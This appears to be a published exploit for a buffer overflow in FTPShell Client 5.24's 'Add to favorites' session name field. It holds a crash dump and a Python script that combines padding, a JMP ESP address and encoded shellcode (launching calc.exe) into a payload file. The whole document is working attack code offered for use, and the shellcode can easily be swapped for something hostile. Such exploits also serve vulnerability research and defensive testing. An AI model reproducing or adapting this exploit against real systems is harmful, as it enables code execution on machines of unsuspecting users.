# Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow # Google Dork: N/A # Date: 2015-01-04 # Exploit Author: INSECT.B # Twitter : @INSECT.B # Facebook : https://www.facebook.com/B.INSECT00 # Blog : http://binsect00.tistory.com # Vendor Homepage: www.ftpshell.com # Software Link: http://www.ftpshell.com/download.htm # Version: 5.24 # Tested on: Windows7 Ultimate SP1 K x86 # CVE : N/A """ [+] Type : Buffer Overflow [-] ftpsehll client has a buffer overlow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field [-] used to add session to favorites list . [+]Crash : input 'A' x 1500 to Session name field [-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!) [-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c [-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0 nv up ei pl zr na pe nc [-] cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 [-] 41414141 ?? ??? """ import struct junk = "A"*460 junk2 = "\x90"*248 esp = "\x0B\xD4\xDF\x73" # JMP ESP #shellcode #CMD : calc.exe #encoder : Alpha-mix encoder #buffer register : esp sc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" + "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" + "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" + "\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x38\x68" + "\x4b\x32\x33\x30\x75\x50\x63\x30\x65\x30\x6c\x49\x5a\x45" + "\x65\x61\x39\x50\x35\x34\x4c\x4b\x46\x30\x54\x70\x4e\x6b" + "\x63\x62\x46\x6c\x6e\x6b\x43\x62\x47\x64\x4c\x4b\x44\x32" + "\x46\x48\x74\x4f\x4f\x47\x51\x5a\x37\x56\x35\x61\x59\x6f" + "\x6e\x4c\x45\x6c\x43\x51\x53\x4c\x43\x32\x44\x6c\x65\x70" + "\x5a\x61\x5a\x6f\x74\x4d\x37\x71\x6a\x67\x4a\x42\x39\x62" + "\x76\x32\x42\x77\x6c\x4b\x31\x42\x36\x70\x4e\x6b\x33\x7a" + "\x57\x4c\x6e\x6b\x32\x6c\x66\x71\x42\x58\x78\x63\x53\x78" + "\x73\x31\x7a\x71\x36\x31\x4e\x6b\x66\x39\x51\x30\x36\x61" + "\x59\x43\x6e\x6b\x57\x39\x62\x38\x58\x63\x45\x6a\x52\x69" + "\x6c\x4b\x44\x74\x4e\x6b\x55\x51\x7a\x76\x70\x31\x69\x6f" + "\x6c\x6c\x6f\x31\x48\x4f\x36\x6d\x65\x51\x7a\x67\x76\x58" + "\x59\x70\x61\x65\x48\x76\x53\x33\x71\x6d\x4b\x48\x35\x6b" + "\x61\x6d\x36\x44\x31\x65\x4b\x54\x30\x58\x6e\x6b\x66\x38" + "\x76\x44\x56\x61\x4e\x33\x51\x76\x6c\x4b\x74\x4c\x72\x6b" + "\x6e\x6b\x71\x48\x47\x6c\x57\x71\x7a\x73\x4c\x4b\x66\x64" + "\x6e\x6b\x36\x61\x6e\x30\x4d\x59\x50\x44\x57\x54\x66\x44" + "\x63\x6b\x71\x4b\x61\x71\x63\x69\x61\x4a\x36\x31\x39\x6f" + "\x59\x70\x61\x4f\x61\x4f\x52\x7a\x4c\x4b\x64\x52\x5a\x4b" + "\x6e\x6d\x31\x4d\x32\x4a\x75\x51\x6c\x4d\x4b\x35\x48\x32" + "\x75\x50\x65\x50\x67\x70\x66\x30\x73\x58\x65\x61\x4c\x4b" + "\x52\x4f\x6b\x37\x59\x6f\x48\x55\x4d\x6b\x38\x70\x78\x35" + "\x59\x32\x33\x66\x72\x48\x79\x36\x5a\x35\x6d\x6d\x4d\x4d" + "\x6b\x4f\x58\x55\x45\x6c\x33\x36\x61\x6c\x76\x6a\x6b\x30" + "\x6b\x4b\x4d\x30\x54\x35\x45\x55\x4f\x4b\x62\x67\x37\x63" + "\x70\x72\x70\x6f\x70\x6a\x45\x50\x46\x33\x69\x6f\x49\x45" + "\x50\x63\x65\x31\x50\x6c\x71\x73\x46\x4e\x42\x45\x70\x78" + "\x73\x55\x75\x50\x41\x41" ) payload = junk + esp + sc + junk2 file=open("C:\\shelll","w") file.write(payload) file.close()